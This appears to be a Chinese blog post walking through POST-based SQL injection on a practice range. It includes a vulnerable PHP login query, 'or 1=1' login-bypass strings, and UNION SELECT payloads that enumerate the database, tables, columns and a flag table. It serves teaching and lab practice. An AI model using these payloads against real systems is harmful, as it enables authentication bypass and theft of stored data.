2. 程式人生 > 其它 >SQL注入顯錯注入-POST

SQL注入顯錯注入-POST

阿新 發佈:2021-09-13

post 形式進行傳參

測試點:

測試萬能密碼

'or 1=1 -- qwe

0x00 首先了解post傳參與get傳參的區別:

特性不同:

Get請求是將資料新增到URL中並傳遞到伺服器,通常利用一個問號“?”代表URL地址的結尾與資料引數的開端。Post請求資料是放在HTTP主體中的,其組織方式不只一種,有"&"連線方式,也有分割符方式,可隱藏引數,傳遞大批資料,比較方便。

傳輸方式不同:

get方式把引數資料列加到提交表單的ACTION屬性所指的URL中,值和表單內各個欄位分別對應,在URL中可以看到。post方式通過HTTP post機制,將表單內各個欄位與其內容放置在HTML HEADER內一起傳送到ACTION屬性所指的URL地址。

服務端獲取資料方式不同:

get方式是伺服器端用Request.QueryString獲取變數的值。post方式是務器端用Request.Form獲取提交的資料。

傳輸資料量不同:

get傳送的資料量較小,不能大於2KB。post傳送的資料量較大,一般預設為不受限制。但實際上會因為伺服器的不同有所差異。

安全性不同:

由於get方式傳遞的引數可以在頁面上看見,所以get安全性非常低。Psot方式傳遞的引數使用者不可見,因此post安全性較高。

0x01 靶場測試

靶場環境:封神臺靶場

漏洞關鍵程式碼:

$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';

檢視程式碼只對'(單引號做了過濾),繞過方式 在POST資料介面 跟上 a' 即可

在登入口 輸入 admin' or 1=1# 萬能密碼 繞過

原理 在和資料庫互動的使用 'or 1=1 條件成立

從而繞過了驗證機制

判斷注入存在

進過測試發現存在3個欄位的注入點

使用一下SQL語句查看回顯點

or 1=2 因為使用了聯合查詢,使前面的條件出錯

a'or 1=2 union select 1,2,3#

檢視庫名

庫名為 post_error

a' or 1=2 union select 1,database(),3#

查看錶

a' or 1=2 union select 1,table_name,3 from information_schema.tables where table_schema="post_error" limit 0,1#
 
a ' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1#'

a' or 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#

檢視欄位

a' union select 1,group_concat(column_name),verison from information_schema.columns where table_schema=database() and table_name="flag"#

a' union select 1,group_concat(flag),3 from flag#



相關推薦

SQL注入注入-POST

post 形式進行傳參 測試點: 測試萬能密碼 \'or 1=1 -- qwe 0x00 首先了解post傳參與get傳參的區別:

sql注入注入常用的三種函式

1.floor()函式 報原因是 報的原因是因為rand()函式在查詢的時候會執行一次,插入的時候還會執行一次.這就是整個語句報的關鍵

MYSQL注入演示

靶場題目:注意閉合 用”)進行閉合 進行閉合後就不再是字串,輸入的資料可以被當成程式碼執行 id=() 閉合了前括號, 還有註釋掉後面的後括號,用-- qwe 主要是為了保留橫橫後面的空格,因為可以自動去除空

sql的報注入總結

1.資料溢位 2.xpath語法錯誤 3.concat+rand()+group by 主鍵重複報 4.幾何函式 1.資料 exp()函式:此函式返回e(自然對數的底)指數X的冪值 ,select 查詢成功返回0, ~0=1111111111111111

sql查詢報注入

一、聯合查詢注入:當有.php?id=1,引數值為id (1)看有無報? \' (2)判斷數字型還是字元型注入

sql 基礎注入

所用方法 sqlmap跑,get請求 通過之前的經驗,知道了資料庫是error,表是error_flag

sql注入(報注入

1、通過floor報,注入語句如下: and select 1 from (select count(),concat(version(),floor(rand(0)2))x from information_schema.tables group by x)a);

sql注入之報注入

1.updatexml()函式 updatexml(xml_target, xpath_expr, new_xml)接受三個引數,此函式將xml標記的給定片段的單個部分xml_target替換為新的new_xml,然後返回更改後的xml。如果xpath寫入錯誤格式,就會報,並且返

Web滲透測試|SQL注入

歡迎點選「演算法與程式設計之美」↑關注我們! 本文首發於微信公眾號:"演算法與程式設計之美",歡迎關注,及時瞭解更多此係列文章。

SQL注入漏洞--報注入

注入注入在沒法用union聯合查詢時用,但前提還是不能過濾一些關鍵的函式。

[sql 注入] insert 報注入與延時盲注

insert注入的技巧在於如何在一個欄位值內構造閉合。 insert 報注入 演示案例所用的表:

sql注入

技術標籤:web安全 sql注入 ​ 報注入就是利用了資料庫的某些機制,人為地製造錯誤條件,使得查詢結果能夠出現在錯誤資訊中。

簡學-SQL注入(報注入

技術標籤:網路安全網路安全mysql 簡學SQL注入 0x09 SQL注入之報注入0x09.1 報注入的原理0x09.2 報注入常見的函式

sql注入:extractvalue、updatexml報原理

sql注入:extractvalue、updatexml報原理 Published on 2019-03-07 11:58 in 分類: sql注入 with 老夏家的部落格

[極客大挑戰 2019]HardSQL 1-SQL注入

SQL注入-報注入 [極客大挑戰 2019]HardSQL 試題地址:http://94d112f4-9aed-4f3e-b2ff-0c98f30a81b9.node4.buuoj.cn/

sql注入之查詢方式及報注入

當進行sql注入時,有很多注入會出無回的情況,其中不回的原因可能是sql語句查詢方式的問題導致的,這個時候我們需要用到相關的報或盲注進行後續操作,同時作為手工注入時,提前瞭解或預知器sqkl語句大概寫法也

SQL注入—報函式

適用情況 Insert/update/delete型資料庫的處理,都是通過報函式進行資料注入的,或者通過DNSlog注入來獲取資料。

sql注入之報注入and boolean注入

1.sql注入之報注入 正常傳參,返回頁面正常; 加入\' 返回頁面報,出現\"zhangsan\"\'

SQL注入

注入在沒法用union聯合查詢時用,但前提還是不能過濾一些關鍵的函式。

SQL注入之updatexml()報注入

SQL注入之updatexml()報注入 updatexml()函式 使用前提 在mysql高版本中(大於5.1版本)中添加了對XML文件進行查詢和修改的函式,updatexml(),extracvalue()